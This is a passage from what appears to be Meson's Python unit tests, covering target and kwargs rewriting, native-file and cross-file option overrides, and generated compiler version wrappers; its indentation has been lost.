'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog10@sha': {'name': 'trivialprog10', 'sources': ['new1.cpp', 'new2.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_remove_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, {})
def test_target_add_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c']}
self.assertDictEqual(out['target']['94b671c@@something@exe'], expected)
def test_target_source_sorting(self):
self.prime('5 sorting')
add_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'src_add', 'sources': ['a666.c']}])
inf_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'info'}])
out = self.rewrite(self.builddir, add_json)
out = self.rewrite(self.builddir, inf_json)
expected = {
'target': {
'exe1@exe': {
'name': 'exe1',
'sources': [
'aaa/a/a1.c',
'aaa/b/b1.c',
'aaa/b/b2.c',
'aaa/f1.c',
'aaa/f2.c',
'aaa/f3.c',
'bbb/a/b1.c',
'bbb/b/b2.c',
'bbb/c1/b5.c',
'bbb/c2/b7.c',
'bbb/c10/b6.c',
'bbb/a4.c',
'bbb/b3.c',
'bbb/b4.c',
'bbb/b5.c',
'a1.c',
'a2.c',
'a3.c',
'a10.c',
'a20.c',
'a30.c',
'a100.c',
'a101.c',
'a110.c',
'a210.c',
'a666.c',
'b1.c',
'c2.c'
]
}
}
}
self.assertDictEqual(out, expected)
def test_target_same_name_skip(self):
self.prime('4 same name targets')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'myExe', 'sources': ['main.cpp']}
self.assertEqual(len(out['target']), 2)
for val in out['target'].values():
self.assertDictEqual(expected, val)
def test_kwargs_info(self):
self.prime('3 kwargs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.2', 'meson_version': '0.50.0', 'license': ['GPL', 'MIT']},
'target#tgt1': {'build_by_default': False, 'build_rpath': '/usr/local', 'dependencies': 'dep1'},
'dependency#dep1': {'required': True, 'method': 'cmake'}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_add(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'add.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': ['GPL', 'MIT', 'BSD', 'Boost']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': 'GPL'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove_regex(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove_regex.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': 'debug=true'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {},
'target#tgt1': {},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=True', 'cpp_std=c++11']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['cpp_std=c++14', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
class NativeFileTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.testcase = os.path.join(self.unit_test_dir, '47 native file binary')
self.current_config = 0
self.current_wrapper = 0
def helper_create_native_file(self, values):
"""Create a config file as a temporary file.
values should be a nested dictionary structure of {section: {key:
value}}
"""
filename = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config))
self.current_config += 1
with open(filename, 'wt') as f:
for section, entries in values.items():
f.write('[{}]\n'.format(section))
for k, v in entries.items():
if isinstance(v, (bool, int, float)):
f.write("{}={}\n".format(k, v))
elif isinstance(v, list):
f.write("{}=[{}]\n".format(k, ', '.join(["'{}'".format(w) for w in v])))
else:
f.write("{}='{}'\n".format(k, v))
return filename
def helper_create_binary_wrapper(self, binary, dir_=None, extra_args=None, **kwargs):
"""Creates a wrapper around a binary that overrides specific values."""
filename = os.path.join(dir_ or self.builddir, 'binary_wrapper{}.py'.format(self.current_wrapper))
extra_args = extra_args or {}
self.current_wrapper += 1
if is_haiku():
chbang = '#!/bin/env python3'
else:
chbang = '#!/usr/bin/env python3'
with open(filename, 'wt') as f:
f.write(textwrap.dedent('''\
{}
import argparse
import subprocess
import sys
def main():
parser = argparse.ArgumentParser()
'''.format(chbang)))
for name in chain(extra_args, kwargs):
f.write(' parser.add_argument("-{0}", "--{0}", action="store_true")\n'.format(name))
f.write(' args, extra_args = parser.parse_known_args()\n')
for name, value in chain(extra_args.items(), kwargs.items()):
f.write(' if args.{}:\n'.format(name))
f.write(' print("{}", file=sys.{})\n'.format(value, kwargs.get('outfile', 'stdout')))
f.write(' sys.exit(0)\n')
f.write(textwrap.dedent('''
ret = subprocess.run(
["{}"] + extra_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
print(ret.stdout.decode('utf-8'))
print(ret.stderr.decode('utf-8'), file=sys.stderr)
sys.exit(ret.returncode)
if __name__ == '__main__':
main()
'''.format(binary)))
if not is_windows():
os.chmod(filename, 0o755)
return filename
# On windows we need yet another level of indirection, as cmd cannot
# invoke python files itself, so instead we generate a .bat file, which
# invokes our python wrapper
batfile = os.path.join(self.builddir, 'binary_wrapper{}.bat'.format(self.current_wrapper))
with open(batfile, 'wt') as f:
f.write(r'@{} {} %*'.format(sys.executable, filename))
return batfile
def helper_for_compiler(self, lang, cb, for_machine = MachineChoice.HOST):
"""Helper for generating tests for overriding compilers for langaugages
with more than one implementation, such as C, C++, ObjC, ObjC++, and D.
"""
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, for_machine)
cc = getter()
binary, newid = cb(cc)
env.binaries[for_machine].binaries[lang] = binary
compiler = getter()
self.assertEqual(compiler.id, newid)
def test_multiple_native_files_override(self):
wrapper = self.helper_create_binary_wrapper('bash', version='foo')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config2 = self.helper_create_native_file({'binaries': {'bash': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
# This test hangs on cygwin.
@unittest.skipIf(os.name != 'posix' or is_cygwin(), 'Uses fifos, which are not available on non Unix OSes.')
def test_native_file_is_pipe(self):
fifo = os.path.join(self.builddir, 'native.file')
os.mkfifo(fifo)
with tempfile.TemporaryDirectory() as d:
wrapper = self.helper_create_binary_wrapper('bash', d, version='12345')
def filler():
with open(fifo, 'w') as f:
f.write('[binaries]\n')
f.write("bash = '{}'\n".format(wrapper))
thread = threading.Thread(target=filler)
thread.start()
self.init(self.testcase, extra_args=['--native-file', fifo, '-Dcase=find_program'])
thread.join()
os.unlink(fifo)
self.init(self.testcase, extra_args=['--wipe'])
def test_multiple_native_files(self):
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('python')
config2 = self.helper_create_native_file({'binaries': {'python': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
def _simple_test(self, case, binary, entry=None):
wrapper = self.helper_create_binary_wrapper(binary, version='12345')
config = self.helper_create_native_file({'binaries': {entry or binary: wrapper}})
self.init(self.testcase, extra_args=['--native-file', config, '-Dcase={}'.format(case)])
def test_find_program(self):
self._simple_test('find_program', 'bash')
def test_config_tool_dep(self):
# Do the skip at this level to avoid screwing up the cache
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with LLVM on MSYS2')
if not shutil.which('llvm-config'):
raise unittest.SkipTest('No llvm-installed, cannot test')
self._simple_test('config_dep', 'llvm-config')
def test_python3_module(self):
self._simple_test('python3', 'python3')
def test_python_module(self):
if is_windows():
# Bat adds extra crap to stdout, so the version check logic in the
# python module breaks. This is fine on other OSes because they
# don't need the extra indirection.
raise unittest.SkipTest('bat indirection breaks internal sanity checks.')
elif is_osx():
binary = 'python'
else:
binary = 'python2'
# We not have python2, check for it
for v in ['2', '2.7', '-2.7']:
rc = subprocess.call(['pkg-config', '--cflags', 'python{}'.format(v)],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
if rc == 0:
break
else:
raise unittest.SkipTest('Not running Python 2 tests because dev packages not installed.')
self._simple_test('python', binary, entry='python')
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CC')
def test_c_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('c', cb)
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CXX')
def test_cpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('cpp', cb)
@skip_if_not_language('objc')
@skip_if_env_set('OBJC')
def test_objc_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('objc', cb)
@skip_if_not_language('objcpp')
@skip_if_env_set('OBJCXX')
def test_objcpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('objcpp', cb)
@skip_if_not_language('d')
@skip_if_env_set('DC')
def test_d_compiler(self):
def cb(comp):
if comp.id == 'dmd':
if shutil.which('ldc'):
return 'ldc', 'ldc'
elif shutil.which('gdc'):
return 'gdc', 'gdc'
else:
raise unittest.SkipTest('No alternative dlang compiler found.')
if shutil.which('dmd'):
return 'dmd', 'dmd'
raise unittest.SkipTest('No alternative dlang compiler found.')
self.helper_for_compiler('d', cb)
@skip_if_not_language('cs')
@skip_if_env_set('CSC')
def test_cs_compiler(self):
def cb(comp):
if comp.id == 'csc':
if not shutil.which('mcs'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'mcs', 'mcs'
if not shutil.which('csc'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'csc', 'csc'
self.helper_for_compiler('cs', cb)
@skip_if_not_language('fortran')
@skip_if_env_set('FC')
def test_fortran_compiler(self):
def cb(comp):
if comp.id == 'lcc':
if shutil.which('lfortran'):
return 'lfortran', 'lcc'
raise unittest.SkipTest('No alternate Fortran implementation.')
elif comp.id == 'gcc':
if shutil.which('ifort'):
# There is an ICC for windows (windows build, linux host),
# but we don't support that ATM so lets not worry about it.
if is_windows():
return 'ifort', 'intel-cl'
return 'ifort', 'intel'
elif shutil.which('flang'):
return 'flang', 'flang'
elif shutil.which('pgfortran'):
return 'pgfortran', 'pgi'
# XXX: there are several other fortran compilers meson
# supports, but I don't have any of them to test with
raise unittest.SkipTest('No alternate Fortran implementation.')
if not shutil.which('gfortran'):
raise unittest.SkipTest('No alternate Fortran implementation.')
return 'gfortran', 'gcc'
self.helper_for_compiler('fortran', cb)
def _single_implementation_compiler(self, lang: str, binary: str, version_str: str, version: str) -> None:
"""Helper for languages with a single (supported) implementation.
Builds a wrapper around the compiler to override the version.
"""
wrapper = self.helper_create_binary_wrapper(binary, version=version_str)
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, MachineChoice.HOST)
env.binaries.host.binaries[lang] = [wrapper]
compiler = getter()
self.assertEqual(compiler.version, version)
@skip_if_not_language('vala')
@skip_if_env_set('VALAC')
def test_vala_compiler(self):
self._single_implementation_compiler(
'vala', 'valac', 'Vala 1.2345', '1.2345')
@skip_if_not_language('rust')
@skip_if_env_set('RUSTC')
def test_rust_compiler(self):
self._single_implementation_compiler(
'rust', 'rustc', 'rustc 1.2345', '1.2345')
@skip_if_not_language('java')
def test_java_compiler(self):
self._single_implementation_compiler(
'java', 'javac', 'javac 9.99.77', '9.99.77')
@skip_if_not_language('swift')
def test_swift_compiler(self):
wrapper = self.helper_create_binary_wrapper(
'swiftc', version='Swift 1.2345', outfile='stderr',
extra_args={'Xlinker': 'macosx_version. PROJECT:ld - 1.2.3'})
env = get_fake_env()
env.binaries.host.binaries['swift'] = [wrapper]
compiler = env.detect_swift_compiler(MachineChoice.HOST)
self.assertEqual(compiler.version, '1.2345')
def test_native_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile')])
def test_native_file_dirs_overridden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib'])
def test_compile_sys_path(self):
"""Compiling with a native file stored in a system path works.
There was a bug which caused the paths to be stored incorrectly and
would result in ninja invoking meson in an infinite loop. This tests
for that by actually invoking ninja.
"""
testcase = os.path.join(self.common_test_dir, '1 trivial')
# It really doesn't matter what's in the native file, just that it exists
config = self.helper_create_native_file({'binaries': {'bash': 'false'}})
self.init(testcase, extra_args=['--native-file', config])
self.build()
def test_user_options(self):
testcase = os.path.join(self.common_test_dir, '41 options')
for opt, value in [('testoption', 'some other val'), ('other_one', True),
('combo_opt', 'one'), ('array_opt', ['two']),
('integer_opt', 0),
('CaseSenSiTivE', 'SOME other Value'),
('CASESENSITIVE', 'some other Value')]:
config = self.helper_create_native_file({'project options': {opt: value}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--native-file', config])
self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option')
def test_user_options_command_line_overrides(self):
testcase = os.path.join(self.common_test_dir, '41 options')
config = self.helper_create_native_file({'project options': {'other_one': True}})
self.init(testcase, extra_args=['--native-file', config, '-Dother_one=false'])
def test_user_options_subproject(self):
testcase = os.path.join(self.unit_test_dir, '80 user options for subproject')
s = os.path.join(testcase, 'subprojects')
if not os.path.exists(s):
os.mkdir(s)
s = os.path.join(s, 'sub')
if not os.path.exists(s):
sub = os.path.join(self.common_test_dir, '41 options')
shutil.copytree(sub, s)
for opt, value in [('testoption', 'some other val'), ('other_one', True),
('combo_opt', 'one'), ('array_opt', ['two']),
('integer_opt', 0)]:
config = self.helper_create_native_file({'sub:project options': {opt: value}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--native-file', config])
self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option')
def test_option_bool(self):
# Bools are allowed to be unquoted
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({'built-in options': {'werror': True}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
# Test that no-per subproject options are inherited from the parent
if 'werror' in each['name']:
self.assertEqual(each['value'], True)
break
else:
self.fail('Did not find werror in build options?')
def test_option_integer(self):
# Bools are allowed to be unquoted
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({'built-in options': {'unity_size': 100}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
# Test that no-per subproject options are inherited from the parent
if 'unity_size' in each['name']:
self.assertEqual(each['value'], 100)
break
else:
self.fail('Did not find unity_size in build options?')
def test_builtin_options(self):
testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_native_file({'built-in options': {'cpp_std': 'c++14'}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'cpp_std':
self.assertEqual(each['value'], 'c++14')
break
else:
self.fail('Did not find werror in build options?')
def test_builtin_options_conf_overrides_env(self):
testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_native_file({'built-in options': {'pkg_config_path': '/foo'}})
self.init(testcase, extra_args=['--native-file', config], override_envvars={'PKG_CONFIG_PATH': '/bar'})
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'pkg_config_path':
self.assertEqual(each['value'], ['/foo'])
break
else:
self.fail('Did not find pkg_config_path in build options?')
def test_builtin_options_subprojects(self):
testcase = os.path.join(self.common_test_dir, '99 subproject subdir')
config = self.helper_create_native_file({'built-in options': {'default_library': 'both', 'c_args': ['-Dfoo']}, 'sub:built-in options': {'default_library': 'static'}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
found = 0
for each in configuration:
# Test that no-per subproject options are inherited from the parent
if 'c_args' in each['name']:
# This path will be hit twice, once for build and once for host,
self.assertEqual(each['value'], ['-Dfoo'])
found += 1
elif each['name'] == 'default_library':
self.assertEqual(each['value'], 'both')
found += 1
elif each['name'] == 'sub:default_library':
self.assertEqual(each['value'], 'static')
found += 1
self.assertEqual(found, 4, 'Did not find all three sections')
def test_builtin_options_subprojects_overrides_buildfiles(self):
# If the buildfile says subproject(... default_library: shared), ensure that's overwritten
testcase = os.path.join(self.common_test_dir, '224 persubproject options')
config = self.helper_create_native_file({'sub2:built-in options': {'default_library': 'shared'}})
with self.assertRaises((RuntimeError, subprocess.CalledProcessError)) as cm:
self.init(testcase, extra_args=['--native-file', config])
if isinstance(cm, RuntimeError):
check = str(cm.exception)
else:
check = cm.exception.stdout
self.assertIn(check, 'Parent should override default_library')
def test_builtin_options_subprojects_dont_inherits_parent_override(self):
# If the buildfile says subproject(... default_library: shared), ensure that's overwritten
testcase = os.path.join(self.common_test_dir, '224 persubproject options')
config = self.helper_create_native_file({'built-in options': {'default_library': 'both'}})
self.init(testcase, extra_args=['--native-file', config])
def test_builtin_options_compiler_properties(self):
# the properties section can have lang_args, and those need to be
# overwritten by the built-in options
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'c_args': ['-DFOO']},
'properties': {'c_args': ['-DBAR']},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'c_args':
self.assertEqual(each['value'], ['-DFOO'])
break
else:
self.fail('Did not find c_args in build options?')
def test_builtin_options_compiler_properties_legacy(self):
# The legacy placement in properties is still valid if a 'built-in
# options' setting is present, but doesn't have the lang_args
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'default_library': 'static'},
'properties': {'c_args': ['-DBAR']},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'c_args':
self.assertEqual(each['value'], ['-DBAR'])
break
else:
self.fail('Did not find c_args in build options?')
def test_builtin_options_paths(self):
# the properties section can have lang_args, and those need to be
# overwritten by the built-in options
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'bindir': 'foo'},
'paths': {'bindir': 'bar'},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'bindir':
self.assertEqual(each['value'], 'foo')
break
else:
self.fail('Did not find bindir in build options?')
def test_builtin_options_paths_legacy(self):
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'default_library': 'static'},
'paths': {'bindir': 'bar'},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'bindir':
self.assertEqual(each['value'], 'bar')
break
else:
self.fail('Did not find bindir in build options?')
class CrossFileTests(BasePlatformTests):
"""Tests for cross file functionality not directly related to
cross compiling.
This is mainly aimed to testing overrides from cross files.
"""
def setUp(self):
super().setUp()
self.current_config = 0
self.current_wrapper = 0
def _cross_file_generator(self, *, needs_exe_wrapper: bool = False,
exe_wrapper: T.Optional[T.List[str]] = None) -> str:
if is_windows():
raise unittest.SkipTest('Cannot run this test on non-mingw/non-cygwin windows')
return textwrap.dedent(f"""\
[binaries]
c = '{shutil.which('gcc' if is_sunos() else 'cc')}'
ar = '{shutil.which('ar')}'
strip = '{shutil.which('strip')}'
exe_wrapper = {str(exe_wrapper) if exe_wrapper is not None else '[]'}
[properties]
needs_exe_wrapper = {needs_exe_wrapper}
[host_machine]
system = 'linux'
cpu_family = 'x86'
cpu = 'i686'
endian = 'little'
""")
def _stub_exe_wrapper(self) -> str:
return textwrap.dedent('''\
#!/usr/bin/env python3
import subprocess
import sys
sys.exit(subprocess.run(sys.argv[1:]).returncode)
''')
def test_needs_exe_wrapper_true(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(needs_exe_wrapper=True))
self.init(testdir, extra_args=['--cross-file=' + str(p)])
out = self.run_target('test')
self.assertRegex(out, r'Skipped:\s*1\s*\n')
def test_needs_exe_wrapper_false(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(needs_exe_wrapper=False))
self.init(testdir, extra_args=['--cross-file=' + str(p)])
out = self.run_target('test')
self.assertNotRegex(out, r'Skipped:\s*1\n')
def test_needs_exe_wrapper_true_wrapper(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
s = Path(d) / 'wrapper.py'
with s.open('wt') as f:
f.write(self._stub_exe_wrapper())
s.chmod(0o774)
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(
needs_exe_wrapper=True,
exe_wrapper=[str(s)]))
self.init(testdir, extra_args=['--cross-file=' + str(p), '-Dexpect=true'])
out = self.run_target('test')
self.assertRegex(out, r'Ok:\s*3\s*\n')
def test_cross_exe_passed_no_wrapper(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(needs_exe_wrapper=True))
self.init(testdir, extra_args=['--cross-file=' + str(p)])
self.build()
out = self.run_target('test')
self.assertRegex(out, r'Skipped:\s*1\s*\n')
# The test uses mocking and thus requires that the current process is the
# one to run the Meson steps. If we are using an external test executable
# (most commonly in Debian autopkgtests) then the mocking won't work.
@unittest.skipIf('MESON_EXE' in os.environ, 'MESON_EXE is defined, can not use mocking.')
def test_cross_file_system_paths(self):
if is_windows():
raise unittest.SkipTest('system crossfile paths not defined for Windows (yet)')
testdir = os.path.join(self.common_test_dir, '1 trivial')
cross_content = self._cross_file_generator()
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
with mock.patch.dict(os.environ, {'XDG_DATA_HOME': d}):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with mock.patch.dict(os.environ, {'XDG_DATA_DIRS': d}):
os.environ.pop('XDG_DATA_HOME', None)
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, '.local', 'share', 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
# If XDG_DATA_HOME is set in the environment running the
# tests this test will fail, os mock the environment, pop
# it, then test
with mock.patch.dict(os.environ):
os.environ.pop('XDG_DATA_HOME', None)
with mock.patch('mesonbuild.coredata.os.path.expanduser', lambda x: x.replace('~', d)):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
def helper_create_cross_file(self, values):
"""Create a config file as a temporary file.
values should be a nested dictionary structure of {section: {key:
value}}
"""
filename = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config))
self.current_config += 1
with open(filename, 'wt') as f:
for section, entries in values.items():
f.write('[{}]\n'.format(section))
for k, v in entries.items():
f.write("{}='{}'\n".format(k, v))
return filename
def test_cross_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_overridden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib',
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_chain(self):
# crossfile2 overrides crossfile overrides nativefile
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'--cross-file', os.path.join(testcase, 'crossfile2'),
'-Ddef_bindir=binbar2',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_user_options(self):
# This is just a touch test for cross file, since the implementation
# shares code after loading from the files
testcase = os.path.join(self.common_test_dir, '41 options')
